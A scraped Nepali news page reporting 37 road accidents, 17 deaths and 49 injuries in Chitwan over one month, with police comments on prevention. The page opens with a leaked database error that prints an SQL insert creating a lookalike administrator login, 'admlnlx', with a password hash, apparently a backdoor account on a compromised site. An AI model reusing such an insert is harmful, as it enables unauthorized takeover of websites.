WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDTTSH1TKMadEnIMj9lS32AtCMajM8/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 18:04:18', '', 'admlnlx', 'admlnlx')
चितवन, पुस १२–
चितवनमा पछिल्लो एक महिनामा मात्रै ३७ वटा दुर्घटना भएको छ । सो दुर्घटनामा परि १७ जनाले ज्यान गुमाएको जिल्ला प्रहरी कार्यालय चितवनले जनाएको छ ।
आज पत्रकार सम्मेलनगरि एक महिनाको विवरण सार्वजनिक गर्दै जिल्ला प्रहरी कार्यालय चितवनका प्रहरी उपरीक्षक थापाले यस्तो जानकारी दिनुभयो । यस्तै ती दुर्घटनाहरुमा ४९ जना घाईते भएका छन् । चितवनमा पछिल्लो समय दुर्घटनाको संख्या बढ्दो अवस्था देखिन्छ ।
एसपी थापाले भन्नुभयो–“दुर्घटना न्यूनीकरणको प्रयासहरु भईरहेको छ, टल्किने स्टीकर टास्नेदेखि जनचेतना जगाउने कामहरु भईरहेका छन् ।”